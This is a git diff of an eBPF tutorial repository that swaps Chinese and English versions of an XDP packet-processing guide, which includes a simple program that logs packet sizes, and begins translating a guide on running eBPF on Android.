**用户空间与内核的转换开销**:当用户空间数据包处理需要与传统内核网络交互时(例如基于套接字的应用程序),数据包必须重新注入到内核中,增加了开销和复杂性。 -4. **专用 CPU 使用**:为了处理高流量,DPDK 和类似解决方案通常需要专用的 CPU 核心来处理数据包,这限制了通用系统的可扩展性和效率。 +2. **Security Boundaries**: These bypass techniques break the kernel’s security model, making it harder to leverage security tools provided by the kernel. -另一个替代 XDP 的方法是使用 Linux 网络栈中的 **内核模块** 或 **挂钩**。虽然这种方法可以很好地集成现有的内核功能,但它需要大量的内核修改,且由于在数据包处理管道的后期运行,无法提供与 XDP 相同的性能优势。 +3. **User-Kernel Transition Costs**: When user-space packet processing needs to interact with traditional kernel networking (like socket-based applications), packets must be reinjected into the kernel, adding overhead and complexity. -### XDP + eBPF 的优势 +4. **Dedicated CPU Usage**: To handle high traffic, DPDK and similar solutions often require dedicating one or more CPU cores solely for packet processing, which limits the scalability and efficiency of general-purpose systems. -XDP 与 eBPF 结合提供了介于内核绕过方案(如 DPDK)和内核集成方案之间的中间地带。以下是 XDP + eBPF 脱颖而出的原因: +Another alternative to XDP is using **kernel modules** or **hooks** in the Linux networking stack. While this method integrates well with existing kernel features, it requires extensive kernel modifications and does not provide the same performance benefits, as it operates later in the packet processing pipeline. -- **高性能**:通过在网络接口卡(NIC)驱动程序级别拦截数据包,XDP 可以实现接近线速的性能,用于丢弃、重定向或负载均衡数据包,同时保持低资源消耗。 +### The XDP + eBPF Advantage + +XDP combined with eBPF offers a middle ground between kernel-bypass solutions like DPDK and kernel-integrated solutions. Here’s why XDP + eBPF stands out: + +- **High Performance**: By intercepting packets early at the NIC driver level, XDP achieves near-line rate performance for tasks like dropping, redirecting, or load balancing packets, all while keeping resource usage low. -- **内核集成**:与 DPDK 不同,XDP 在 Linux 内核中工作,允许与现有的内核网络栈和工具(如 `iptables`、`nftables` 或套接字)无缝交互。无需在用户空间重新实现网络协议。 +- **Kernel Integration**: Unlike DPDK, XDP works within the Linux kernel, allowing seamless interaction with the existing kernel network stack and tools (such as `iptables`, `nftables`, or sockets). There’s no need to reimplement networking protocols in user space. -- **安全性**:eBPF 虚拟机确保用户定义的 XDP 程序是被隔离的,不会对内核造成不稳定影响。eBPF 的安全模型防止恶意或有缺陷的代码损害系统,提供了一个安全的可编程数据包处理环境。 +- **Security**: The eBPF virtual machine (VM) ensures that user-defined XDP programs are sandboxed and constrained, which means they cannot destabilize the kernel. The security model of eBPF prevents malicious or buggy code from harming the system, providing a safe environment for programmable packet processing. -- **不需要专用 CPU**:XDP 允许数据包处理而无需将整个 CPU 核心专用于网络任务。这提高了系统的整体效率,允许更灵活的资源分配。 +- **No Dedicated CPUs Required**: XDP allows packet processing without dedicating entire CPU cores solely to network tasks. This improves the overall efficiency of the system, allowing for more flexible resource allocation. -总的来说,XDP + eBPF 提供了一种强大的可编程数据包处理解决方案,结合了高性能与内核集成的灵活性和安全性。它消除了完全绕过内核方案的缺点,同时保留了内核安全性和功能的优势。 +In summary, XDP + eBPF delivers a robust solution for programmable packet processing that combines high performance with the flexibility and safety of kernel integration. It eliminates the drawbacks of full kernel-bypass solutions while retaining the benefits of kernel security and functionality. -## XDP 的项目和应用案例 +## Projects and Use Cases with XDP -XDP 已经在许多高调的项目中得到应用,这些项目展示了它在实际网络场景中的强大功能和灵活性: +XDP is already being used in a number of high-profile projects that highlight its power and flexibility in real-world networking scenarios: ### 1. 
**Cilium** -- **描述**:Cilium 是一个为云原生环境(尤其是 Kubernetes)设计的开源网络、安全和可观测性工具。它利用 XDP 实现高性能的数据包过滤和负载均衡。 -- **应用案例**:Cilium 将数据包过滤和安全策略卸载到 XDP,实现高吞吐量和低延迟的容器化环境流量管理,同时不牺牲可扩展性。 -- **链接**:[Cilium](https://cilium.io/) +- **Description**: Cilium is an open-source networking, security, and observability tool designed for cloud-native environments, especially Kubernetes. It leverages XDP to implement high-performance packet filtering and load balancing. +- **Use Case**: Cilium offloads packet filtering and security policies to XDP, enabling high-throughput and low-latency traffic management in containerized environments without sacrificing scalability. +- **Link**: [Cilium](https://cilium.io/) ### 2. **Katran** -- **描述**:Katran 是由 Facebook 开发的第 4 层负载均衡器,优化了高可扩展性和性能。它使用 XDP 处理数据包转发,开销极小。 -- **应用案例**:Katran 每秒处理数百万个数据包,高效地将流量分配到后端服务器上,利用 XDP 在大规模数据中心中实现低延迟和高性能的负载均衡。 -- **链接**:[Katran GitHub](https://github.com/facebookincubator/katran) +- **Description**: Katran is a layer 4 load balancer developed by Facebook, optimized for high scalability and performance. It uses XDP to handle packet forwarding with minimal overhead. +- **Use Case**: Katran processes millions of packets per second to distribute traffic across backend servers efficiently, using XDP to achieve low-latency and high-performance load balancing in large-scale data centers. +- **Link**: [Katran GitHub](https://github.com/facebookincubator/katran) -### 3. **Cloudflare 的 XDP DDoS 保护** +### 3. **XDP DDoS Protection at Cloudflare** -- **描述**:Cloudflare 已经实现了基于 XDP 的实时 DDoS 缓解。通过在 NIC 级别处理数据包,Cloudflare 能够在恶意流量进入网络栈之前过滤掉攻击流量,最小化 DDoS 攻击对其系统的影响。 -- **应用案例**:Cloudflare 利用 XDP 在管道早期丢弃恶意数据包,保护其基础设施免受大规模 DDoS 攻击,同时保持对合法流量的高可用性。 -- **链接**:[Cloudflare 博客关于 XDP](https://blog.cloudflare.com/l4drop-xdp-ebpf-based-ddos-mitigations/) +- **Description**: Cloudflare has implemented XDP for real-time DDoS mitigation. By processing packets at the NIC level, Cloudflare can filter out attack traffic before it reaches the networking stack, minimizing the impact of DDoS attacks on their systems. +- **Use Case**: Cloudflare leverages XDP to drop malicious packets early in the pipeline, protecting their infrastructure from large-scale DDoS attacks while maintaining high availability for legitimate traffic. +- **Link**: [Cloudflare Blog on XDP](https://blog.cloudflare.com/l4drop-xdp-ebpf-based-ddos-mitigations/) -这些项目展示了 XDP 在不同领域的可扩展和高效的数据包处理能力,从安全和负载均衡到云原生网络。 +These projects demonstrate the real-world capabilities of XDP for scalable and efficient packet processing across different domains, from security and load balancing to cloud-native networking. -### 为什么选择 XDP 而不是其他方法? +### Why Use XDP Over Other Methods? -与传统方法(如 `iptables`、`nftables` 或 `tc`)相比,XDP 提供了几个明显的优势: +Compared to traditional methods like `iptables`, `nftables`, or `tc`, XDP offers several clear advantages: -- **速度与低开销**:XDP 直接在 NIC 驱动程序中运行,绕过了内核的大部分开销,使数据包处理更快。 +- **Speed and Low Overhead**: Operating directly in the NIC driver, XDP bypasses much of the kernel’s overhead, enabling faster packet processing. -- **可定制性**:XDP 允许开发人员通过 eBPF 创建自定义的数据包处理程序,提供比传统工具(如 `iptables`)更大的灵活性和细粒度控制。 +- **Customizability**: XDP allows developers to create custom packet-processing programs with eBPF, providing more flexibility and granularity than legacy tools like `iptables`. 
-- **资源效率**:XDP 不需要像 DPDK 等用户空间解决方案那样将整个 CPU 核心专用于数据包处理,因此它是高性能网络的更高效选择。 +- **Resource Efficiency**: XDP does not require dedicating entire CPU cores to packet processing, unlike user-space solutions like DPDK, making it a more efficient choice for high-performance networking. -## 编写 eBPF 程序 +## Writing your first XDP Program ```C #include "vmlinux.h" @@ -94,9 +96,9 @@ int xdp_pass(struct xdp_md* ctx) { char __license[] SEC("license") = "GPL"; ``` -这是一段 C 语言实现的 eBPF 内核侧代码,它能够通过 xdp 捕获所有经过目标网络设备的数据包,计算其大小并输出到 `trace_pipe` 中。 +This is a kernel-side eBPF code written in C. It captures all packets passing through the target network device using XDP, calculates their size, and outputs it to `trace_pipe`. -值得注意的是,在代码中我们使用了以下注释: +It's worth noting the following annotations in the code: ```C /// @ifindex 1 @@ -104,23 +106,23 @@ char __license[] SEC("license") = "GPL"; /// @xdpopts {"old_prog_fd":0} ``` -这是由 eunomia-bpf 提供的功能,我们可以通过这样的注释告知 eunomia-bpf 加载器此 xdp 程序想要挂载的目标网络设备编号,挂载的标志和选项。 +This functionality is provided by eunomia-bpf, which allows these annotations to inform the eunomia-bpf loader about the desired target network device number, mounting flags, and options for this XDP program. -这些变量的设计基于 libbpf 提供的 API,可以通过 [patchwork](https://patchwork.kernel.org/project/netdevbpf/patch/20220120061422.2710637-2-andrii@kernel.org/#24705508) 查看接口的详细介绍。 +These variables are based on the API provided by libbpf. Detailed information about the interface can be viewed [here](https://patchwork.kernel.org/project/netdevbpf/patch/20220120061422.2710637-2-andrii@kernel.org/#24705508). -`SEC("xdp")` 宏指出 BPF 程序的类型,`ctx` 是此 BPF 程序执行的上下文,用于包处理流程。 +The `SEC("xdp")` macro indicates the type of the BPF program, while `ctx` is the execution context of this BPF program for packet processing. -在程序的最后,我们返回了 `XDP_PASS`,这表示我们的 xdp 程序会将经过目标网络设备的包正常交付给内核的网络协议栈。可以通过 [XDP actions](https://prototype-kernel.readthedocs.io/en/latest/networking/XDP/implementation/xdp_actions.html) 了解更多 xdp 的处理动作。 +At the end of the program, we return `XDP_PASS`, signaling that our XDP program will deliver packets passing through the target network device to the kernel's network protocol stack as usual. For more on XDP actions, see [XDP actions](https://prototype-kernel.readthedocs.io/en/latest/networking/XDP/implementation/xdp_actions.html). -## 编译运行 +## Compilation and Execution -通过容器编译: +To compile using a container: ```console docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest ``` -或是通过 `ecc` 编译: +Or compile with `ecc`: ```console $ ecc xdp.bpf.c @@ -128,13 +130,13 @@ Compiling bpf object... Packing ebpf object and config into package.json... ``` -并通过 `ecli` 运行: +Then, run with `ecli`: ```console sudo ecli run package.json ``` -可以通过如下方式查看程序的输出: +To view the program's output: ```console $ sudo cat /sys/kernel/tracing/trace_pipe @@ -144,14 +146,18 @@ $ sudo cat /sys/kernel/tracing/trace_pipe node-1939 [000] d.s11 1601.275860: bpf_trace_printk: packet size is 344 ``` -## 总结 +## Conclusion -本文介绍了如何使用 xdp 来处理经过特定网络设备的包,基于 eunomia-bpf 提供的通过注释向 libbpf 传递参数的方案,我们可以将自己编写的 xdp BPF 程序以指定选项挂载到目标设备,并在网络包进入内核网络协议栈之前就对其进行处理,从而获取高性能的可编程包处理能力。 +This article introduces how to use XDP to process packets passing through a specific network device. With eunomia-bpf's annotation-based approach for passing parameters to libbpf, we can mount our custom XDP BPF program onto the target device with specified options. 
This allows packet processing even before they enter the kernel's network protocol stack, achieving high-performance programmable packet processing. -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +For those interested in further exploring eBPF, visit our tutorial code repository at or website for more examples and a comprehensive guide. -## 参考资料 +## References + +For more information, you can refer to: - - - + +> The original link of this article: diff --git a/src/21-xdp/README.zh.md b/src/21-xdp/README.zh.md new file mode 100644 index 0000000..d6269fa --- /dev/null +++ b/src/21-xdp/README.zh.md @@ -0,0 +1,157 @@ +# eBPF 入门实践教程二十一: 使用 XDP 进行可编程数据包处理 + +在本教程中,我们将介绍 XDP(eXpress Data Path),并通过一个简单的例子帮助你入门。之后,我们将探讨更高级的 XDP 应用,例如负载均衡器、防火墙及其他实际应用。如果你对 eBPF 或 XDP 感兴趣,请在 [Github](https://github.com/eunomia-bpf/bpf-developer-tutorial) 上为我们点赞! + +## 什么是 XDP? + +XDP 是 Linux 内核中的一种高性能可编程数据路径,专为网络接口级的数据包处理而设计。通过将 eBPF 程序直接附加到网络设备驱动程序上,XDP 能够在数据包到达内核网络栈之前拦截并处理它们。这使得 XDP 能够进行极低延迟和高效的数据包处理,非常适合如 DDoS 防护、负载均衡和流量过滤等任务。实际上,XDP 每核心的吞吐量可以高达 **每秒 2400 万包(Mpps)**。 + +### 为什么选择 XDP? + +XDP 运行在比传统 Linux 网络组件(如 cBPF)更低的层级,在网络设备驱动程序的软中断上下文中执行。它能够在数据包被内核标准网络栈处理之前对其进行处理,避免了创建 Linux 中表示网络数据包的 `skb_buff` 结构。这种早期处理为简单但频繁的操作(如丢弃恶意数据包或负载均衡服务器)带来了显著的性能提升。 + +与其他数据包处理机制相比,XDP 在性能和可用性之间取得了平衡,它利用了 Linux 内核的安全性和可靠性,同时通过可编程的 eBPF 提供了灵活性。 + +## XDP 与其他方法的比较 + +在 XDP 出现之前,一些解决方案通过完全绕过内核来加速数据包处理。其中一个显著的例子是 **DPDK**(数据平面开发工具包)。DPDK 允许用户空间应用程序直接控制网络设备,从而实现非常高的性能。然而,这种方法也存在一些权衡: + +1. **缺乏内核集成**:DPDK 及其他内核绕过解决方案无法利用现有的内核网络功能,开发者必须在用户空间重新实现许多协议和功能。 + +2. **安全边界**:这些绕过技术破坏了内核的安全模型,使得难以利用内核提供的安全工具。 +3. **用户空间与内核的转换开销**:当用户空间数据包处理需要与传统内核网络交互时(例如基于套接字的应用程序),数据包必须重新注入到内核中,增加了开销和复杂性。 +4. **专用 CPU 使用**:为了处理高流量,DPDK 和类似解决方案通常需要专用的 CPU 核心来处理数据包,这限制了通用系统的可扩展性和效率。 + +另一个替代 XDP 的方法是使用 Linux 网络栈中的 **内核模块** 或 **挂钩**。虽然这种方法可以很好地集成现有的内核功能,但它需要大量的内核修改,且由于在数据包处理管道的后期运行,无法提供与 XDP 相同的性能优势。 + +### XDP + eBPF 的优势 + +XDP 与 eBPF 结合提供了介于内核绕过方案(如 DPDK)和内核集成方案之间的中间地带。以下是 XDP + eBPF 脱颖而出的原因: + +- **高性能**:通过在网络接口卡(NIC)驱动程序级别拦截数据包,XDP 可以实现接近线速的性能,用于丢弃、重定向或负载均衡数据包,同时保持低资源消耗。 + +- **内核集成**:与 DPDK 不同,XDP 在 Linux 内核中工作,允许与现有的内核网络栈和工具(如 `iptables`、`nftables` 或套接字)无缝交互。无需在用户空间重新实现网络协议。 + +- **安全性**:eBPF 虚拟机确保用户定义的 XDP 程序是被隔离的,不会对内核造成不稳定影响。eBPF 的安全模型防止恶意或有缺陷的代码损害系统,提供了一个安全的可编程数据包处理环境。 + +- **不需要专用 CPU**:XDP 允许数据包处理而无需将整个 CPU 核心专用于网络任务。这提高了系统的整体效率,允许更灵活的资源分配。 + +总的来说,XDP + eBPF 提供了一种强大的可编程数据包处理解决方案,结合了高性能与内核集成的灵活性和安全性。它消除了完全绕过内核方案的缺点,同时保留了内核安全性和功能的优势。 + +## XDP 的项目和应用案例 + +XDP 已经在许多高调的项目中得到应用,这些项目展示了它在实际网络场景中的强大功能和灵活性: + +### 1. **Cilium** + +- **描述**:Cilium 是一个为云原生环境(尤其是 Kubernetes)设计的开源网络、安全和可观测性工具。它利用 XDP 实现高性能的数据包过滤和负载均衡。 +- **应用案例**:Cilium 将数据包过滤和安全策略卸载到 XDP,实现高吞吐量和低延迟的容器化环境流量管理,同时不牺牲可扩展性。 +- **链接**:[Cilium](https://cilium.io/) + +### 2. **Katran** + +- **描述**:Katran 是由 Facebook 开发的第 4 层负载均衡器,优化了高可扩展性和性能。它使用 XDP 处理数据包转发,开销极小。 +- **应用案例**:Katran 每秒处理数百万个数据包,高效地将流量分配到后端服务器上,利用 XDP 在大规模数据中心中实现低延迟和高性能的负载均衡。 +- **链接**:[Katran GitHub](https://github.com/facebookincubator/katran) + +### 3. **Cloudflare 的 XDP DDoS 保护** + +- **描述**:Cloudflare 已经实现了基于 XDP 的实时 DDoS 缓解。通过在 NIC 级别处理数据包,Cloudflare 能够在恶意流量进入网络栈之前过滤掉攻击流量,最小化 DDoS 攻击对其系统的影响。 +- **应用案例**:Cloudflare 利用 XDP 在管道早期丢弃恶意数据包,保护其基础设施免受大规模 DDoS 攻击,同时保持对合法流量的高可用性。 +- **链接**:[Cloudflare 博客关于 XDP](https://blog.cloudflare.com/l4drop-xdp-ebpf-based-ddos-mitigations/) + +这些项目展示了 XDP 在不同领域的可扩展和高效的数据包处理能力,从安全和负载均衡到云原生网络。 + +### 为什么选择 XDP 而不是其他方法? 
+ +与传统方法(如 `iptables`、`nftables` 或 `tc`)相比,XDP 提供了几个明显的优势: + +- **速度与低开销**:XDP 直接在 NIC 驱动程序中运行,绕过了内核的大部分开销,使数据包处理更快。 + +- **可定制性**:XDP 允许开发人员通过 eBPF 创建自定义的数据包处理程序,提供比传统工具(如 `iptables`)更大的灵活性和细粒度控制。 + +- **资源效率**:XDP 不需要像 DPDK 等用户空间解决方案那样将整个 CPU 核心专用于数据包处理,因此它是高性能网络的更高效选择。 + +## 编写 eBPF 程序 + +```C +#include "vmlinux.h" +#include + +/// @ifindex 1 +/// @flags 0 +/// @xdpopts {"old_prog_fd":0} +SEC("xdp") +int xdp_pass(struct xdp_md* ctx) { + void* data = (void*)(long)ctx->data; + void* data_end = (void*)(long)ctx->data_end; + int pkt_sz = data_end - data; + + bpf_printk("packet size is %d", pkt_sz); + return XDP_PASS; +} + +char __license[] SEC("license") = "GPL"; +``` + +这是一段 C 语言实现的 eBPF 内核侧代码,它能够通过 xdp 捕获所有经过目标网络设备的数据包,计算其大小并输出到 `trace_pipe` 中。 + +值得注意的是,在代码中我们使用了以下注释: + +```C +/// @ifindex 1 +/// @flags 0 +/// @xdpopts {"old_prog_fd":0} +``` + +这是由 eunomia-bpf 提供的功能,我们可以通过这样的注释告知 eunomia-bpf 加载器此 xdp 程序想要挂载的目标网络设备编号,挂载的标志和选项。 + +这些变量的设计基于 libbpf 提供的 API,可以通过 [patchwork](https://patchwork.kernel.org/project/netdevbpf/patch/20220120061422.2710637-2-andrii@kernel.org/#24705508) 查看接口的详细介绍。 + +`SEC("xdp")` 宏指出 BPF 程序的类型,`ctx` 是此 BPF 程序执行的上下文,用于包处理流程。 + +在程序的最后,我们返回了 `XDP_PASS`,这表示我们的 xdp 程序会将经过目标网络设备的包正常交付给内核的网络协议栈。可以通过 [XDP actions](https://prototype-kernel.readthedocs.io/en/latest/networking/XDP/implementation/xdp_actions.html) 了解更多 xdp 的处理动作。 + +## 编译运行 + +通过容器编译: + +```console +docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest +``` + +或是通过 `ecc` 编译: + +```console +$ ecc xdp.bpf.c +Compiling bpf object... +Packing ebpf object and config into package.json... +``` + +并通过 `ecli` 运行: + +```console +sudo ecli run package.json +``` + +可以通过如下方式查看程序的输出: + +```console +$ sudo cat /sys/kernel/tracing/trace_pipe + node-1939 [000] d.s11 1601.190413: bpf_trace_printk: packet size is 177 + node-1939 [000] d.s11 1601.190479: bpf_trace_printk: packet size is 66 + ksoftirqd/1-19 [001] d.s.1 1601.237507: bpf_trace_printk: packet size is 66 + node-1939 [000] d.s11 1601.275860: bpf_trace_printk: packet size is 344 +``` + +## 总结 + +本文介绍了如何使用 xdp 来处理经过特定网络设备的包,基于 eunomia-bpf 提供的通过注释向 libbpf 传递参数的方案,我们可以将自己编写的 xdp BPF 程序以指定选项挂载到目标设备,并在网络包进入内核网络协议栈之前就对其进行处理,从而获取高性能的可编程包处理能力。 + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +## 参考资料 + +- +- +- diff --git a/src/21-xdp/README_en.md b/src/21-xdp/README_en.md deleted file mode 100644 index ef6928c..0000000 --- a/src/21-xdp/README_en.md +++ /dev/null @@ -1,163 +0,0 @@ -# eBPF Tutorial by Example 21: Programmable Packet Processing with XDP - -In this tutorial, we will introduce XDP (eXpress Data Path) and walk through a small example to help you get started. Later on, we will explore more advanced XDP applications, such as load balancers, firewalls, and other real-world use cases. Please give us a start on [Github](https://github.com/eunomia-bpf/bpf-developer-tutorial) if you are interested in eBPF or XDP! - -## What is XDP? - -XDP is a high-performance, programmable data path in the Linux kernel, designed for packet processing at the network interface level. By attaching eBPF programs directly to network device drivers, XDP can intercept and handle packets before they reach the kernel’s networking stack. This allows for extremely low-latency and efficient packet processing, making it ideal for tasks like DDoS defense, load balancing, and traffic filtering. In fact, XDP can achieve throughput as high as **24 million packets per second (Mpps) per core**. - -### Why XDP? 
- -XDP operates at a lower level than traditional Linux networking components, like cBPF (Classic BPF), by running inside the soft interrupt context of the network device driver. It can handle packets before they are even processed by the kernel's standard networking stack, bypassing the creation of the `skb_buff` structure, which represents network packets in Linux. This early-stage processing provides significant performance gains for simple but frequent operations like dropping malicious packets or load balancing across servers. - -Compared to other packet processing mechanisms, XDP strikes a balance between performance and usability, leveraging the security and reliability of the Linux kernel while providing flexibility through programmable eBPF. - -## Overview of XDP vs. Other Approaches - -Before XDP, several other solutions aimed to accelerate packet processing by bypassing the kernel entirely. One prominent example is **DPDK** (Data Plane Development Kit). DPDK allows user-space applications to take direct control of network devices, achieving very high performance. However, this approach comes with trade-offs: - -1. **Lack of Kernel Integration**: DPDK and other kernel-bypass solutions cannot utilize existing kernel networking features, requiring developers to reimplement many protocols and functions in user space. - -2. **Security Boundaries**: These bypass techniques break the kernel’s security model, making it harder to leverage security tools provided by the kernel. - -3. **User-Kernel Transition Costs**: When user-space packet processing needs to interact with traditional kernel networking (like socket-based applications), packets must be reinjected into the kernel, adding overhead and complexity. - -4. **Dedicated CPU Usage**: To handle high traffic, DPDK and similar solutions often require dedicating one or more CPU cores solely for packet processing, which limits the scalability and efficiency of general-purpose systems. - -Another alternative to XDP is using **kernel modules** or **hooks** in the Linux networking stack. While this method integrates well with existing kernel features, it requires extensive kernel modifications and does not provide the same performance benefits, as it operates later in the packet processing pipeline. - -### The XDP + eBPF Advantage - -XDP combined with eBPF offers a middle ground between kernel-bypass solutions like DPDK and kernel-integrated solutions. Here’s why XDP + eBPF stands out: - -- **High Performance**: By intercepting packets early at the NIC driver level, XDP achieves near-line rate performance for tasks like dropping, redirecting, or load balancing packets, all while keeping resource usage low. - -- **Kernel Integration**: Unlike DPDK, XDP works within the Linux kernel, allowing seamless interaction with the existing kernel network stack and tools (such as `iptables`, `nftables`, or sockets). There’s no need to reimplement networking protocols in user space. - -- **Security**: The eBPF virtual machine (VM) ensures that user-defined XDP programs are sandboxed and constrained, which means they cannot destabilize the kernel. The security model of eBPF prevents malicious or buggy code from harming the system, providing a safe environment for programmable packet processing. - -- **No Dedicated CPUs Required**: XDP allows packet processing without dedicating entire CPU cores solely to network tasks. This improves the overall efficiency of the system, allowing for more flexible resource allocation. 
- -In summary, XDP + eBPF delivers a robust solution for programmable packet processing that combines high performance with the flexibility and safety of kernel integration. It eliminates the drawbacks of full kernel-bypass solutions while retaining the benefits of kernel security and functionality. - -## Projects and Use Cases with XDP - -XDP is already being used in a number of high-profile projects that highlight its power and flexibility in real-world networking scenarios: - -### 1. **Cilium** - -- **Description**: Cilium is an open-source networking, security, and observability tool designed for cloud-native environments, especially Kubernetes. It leverages XDP to implement high-performance packet filtering and load balancing. -- **Use Case**: Cilium offloads packet filtering and security policies to XDP, enabling high-throughput and low-latency traffic management in containerized environments without sacrificing scalability. -- **Link**: [Cilium](https://cilium.io/) - -### 2. **Katran** - -- **Description**: Katran is a layer 4 load balancer developed by Facebook, optimized for high scalability and performance. It uses XDP to handle packet forwarding with minimal overhead. -- **Use Case**: Katran processes millions of packets per second to distribute traffic across backend servers efficiently, using XDP to achieve low-latency and high-performance load balancing in large-scale data centers. -- **Link**: [Katran GitHub](https://github.com/facebookincubator/katran) - -### 3. **XDP DDoS Protection at Cloudflare** - -- **Description**: Cloudflare has implemented XDP for real-time DDoS mitigation. By processing packets at the NIC level, Cloudflare can filter out attack traffic before it reaches the networking stack, minimizing the impact of DDoS attacks on their systems. -- **Use Case**: Cloudflare leverages XDP to drop malicious packets early in the pipeline, protecting their infrastructure from large-scale DDoS attacks while maintaining high availability for legitimate traffic. -- **Link**: [Cloudflare Blog on XDP](https://blog.cloudflare.com/l4drop-xdp-ebpf-based-ddos-mitigations/) - -These projects demonstrate the real-world capabilities of XDP for scalable and efficient packet processing across different domains, from security and load balancing to cloud-native networking. - -### Why Use XDP Over Other Methods? - -Compared to traditional methods like `iptables`, `nftables`, or `tc`, XDP offers several clear advantages: - -- **Speed and Low Overhead**: Operating directly in the NIC driver, XDP bypasses much of the kernel’s overhead, enabling faster packet processing. - -- **Customizability**: XDP allows developers to create custom packet-processing programs with eBPF, providing more flexibility and granularity than legacy tools like `iptables`. - -- **Resource Efficiency**: XDP does not require dedicating entire CPU cores to packet processing, unlike user-space solutions like DPDK, making it a more efficient choice for high-performance networking. - -## Writing your first XDP Program - -```C -#include "vmlinux.h" -#include - -/// @ifindex 1 -/// @flags 0 -/// @xdpopts {"old_prog_fd":0} -SEC("xdp") -int xdp_pass(struct xdp_md* ctx) { - void* data = (void*)(long)ctx->data; - void* data_end = (void*)(long)ctx->data_end; - int pkt_sz = data_end - data; - - bpf_printk("packet size is %d", pkt_sz); - return XDP_PASS; -} - -char __license[] SEC("license") = "GPL"; -``` - -This is a kernel-side eBPF code written in C. 
It captures all packets passing through the target network device using XDP, calculates their size, and outputs it to `trace_pipe`. - -It's worth noting the following annotations in the code: - -```C -/// @ifindex 1 -/// @flags 0 -/// @xdpopts {"old_prog_fd":0} -``` - -This functionality is provided by eunomia-bpf, which allows these annotations to inform the eunomia-bpf loader about the desired target network device number, mounting flags, and options for this XDP program. - -These variables are based on the API provided by libbpf. Detailed information about the interface can be viewed [here](https://patchwork.kernel.org/project/netdevbpf/patch/20220120061422.2710637-2-andrii@kernel.org/#24705508). - -The `SEC("xdp")` macro indicates the type of the BPF program, while `ctx` is the execution context of this BPF program for packet processing. - -At the end of the program, we return `XDP_PASS`, signaling that our XDP program will deliver packets passing through the target network device to the kernel's network protocol stack as usual. For more on XDP actions, see [XDP actions](https://prototype-kernel.readthedocs.io/en/latest/networking/XDP/implementation/xdp_actions.html). - -## Compilation and Execution - -To compile using a container: - -```console -docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest -``` - -Or compile with `ecc`: - -```console -$ ecc xdp.bpf.c -Compiling bpf object... -Packing ebpf object and config into package.json... -``` - -Then, run with `ecli`: - -```console -sudo ecli run package.json -``` - -To view the program's output: - -```console -$ sudo cat /sys/kernel/tracing/trace_pipe - node-1939 [000] d.s11 1601.190413: bpf_trace_printk: packet size is 177 - node-1939 [000] d.s11 1601.190479: bpf_trace_printk: packet size is 66 - ksoftirqd/1-19 [001] d.s.1 1601.237507: bpf_trace_printk: packet size is 66 - node-1939 [000] d.s11 1601.275860: bpf_trace_printk: packet size is 344 -``` - -## Conclusion - -This article introduces how to use XDP to process packets passing through a specific network device. With eunomia-bpf's annotation-based approach for passing parameters to libbpf, we can mount our custom XDP BPF program onto the target device with specified options. This allows packet processing even before they enter the kernel's network protocol stack, achieving high-performance programmable packet processing. - -For those interested in further exploring eBPF, visit our tutorial code repository at or website for more examples and a comprehensive guide. - -## References - -For more information, you can refer to: - -- -- -- - -> The original link of this article: diff --git a/src/22-android/README.md b/src/22-android/README.md index 07d7114..f1f660b 100644 --- a/src/22-android/README.md +++ b/src/22-android/README.md @@ -1,69 +1,68 @@ -# 在 Android 上使用 eBPF 程序 +# eBPF Tutorial by Example: Using eBPF Programs on Android -> 本文主要记录了笔者在 Android Studio Emulator 中测试高版本 Android Kernel 对基于 libbpf 的 CO-RE 技术支持程度的探索过程、结果和遇到的问题。 -> 测试采用的方式是在 Android Shell 环境下构建 Debian 环境,并基于此尝试构建 eunomia-bpf 工具链、运行其测试用例。 +> This article mainly documents the author's exploration process, results, and issues encountered while testing the level of support for CO-RE technology based on the libbpf library on high version Android kernels in the Android Studio Emulator. +> The test was conducted by building a Debian environment in the Android Shell environment and attempting to build the eunomia-bpf toolchain and run its test cases based on this. 
-## 背景 +## Background -截至目前(2023-04),Android 还未对 eBPF 程序的动态加载做出较好的支持,无论是以 bcc 为代表的带编译器分发方案,还是基于 btf 和 libbpf 的 CO-RE 方案,都在较大程度上离不开 Linux 环境的支持,无法在 Android 系统上很好地运行[^WeiShu]。 +As of now (2023-04), Android has not provided good support for dynamic loading of eBPF programs. Both the compiler distribution scheme represented by bcc and the CO-RE scheme based on btf and libbpf rely heavily on Linux environment support and cannot run well on the Android system.[^WeiShu] -虽然如此,在 Android 平台上尝试 eBPF 也已经有了一些成功案例,除谷歌官方提供的修改 `Android.bp` 以将 eBPF 程序随整个系统一同构建并挂载的方案[^Google],也有人提出基于 Android 内核构建 Linux 环境进而运行 eBPF 工具链的思路,并开发了相关工具。 +However, there have been some successful cases of trying eBPF on the Android platform. In addition to the solution provided by Google to modify `Android.bp` to build and mount eBPF programs with the entire system[^Google], some people have proposed building a Linux environment based on the Android kernel and running the eBPF toolchain using this approach, and have developed related tools. -目前已有的资料,大多基于 adeb/eadb 在 Android 内核基础上构建 Linux 沙箱,并对 bcc 和 bpftrace 相关工具链进行测试,而对 CO-RE 方案的测试工作较少。在 Android 上使用 bcc 工具目前有较多参考资料,如: +Currently available information mostly focuses on the testing of bcc and bpftrace toolchains based on the adeb/eadb sandbox built on the Android kernel, with less testing work on the CO-RE scheme. There is more reference material available for using the bcc tool on Android, such as: -+ SeeFlowerX: -+ evilpan: ++ SeeFlowerX: ++ evilpan: -其主要思路是利用 chroot 在 Android 内核上运行一个 Debian 镜像,并在其中构建整个 bcc 工具链,从而使用 eBPF 工具。如果想要使用 bpftrace,原理也是类似的。 +The main idea is to use chroot to run a Debian image on the Android kernel and build the entire bcc toolchain within it in order to use eBPF tools. The same principle applies to using bpftrace. -事实上,高版本的 Android 内核已支持 btf 选项,这意味着 eBPF 领域中新兴的 CO-RE 技术也应当能够运用到基于 Android 内核的 Linux 系统中。本文将基于此对 eunomia-bpf 在模拟器环境下进行测试运行。 +In fact, higher versions of the Android kernel already support the btf option, which means that the emerging CO-RE technology in the eBPF field should also be applicable to Linux systems based on the Android kernel. This article will test and run eunomia-bpf in the emulator environment based on this. -> [eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf) 是一个结合了 libbpf 和 WebAssembly 技术的开源项目,旨在简化 eBPF 程序的编写、编译和部署。该项目可被视作 CO-RE 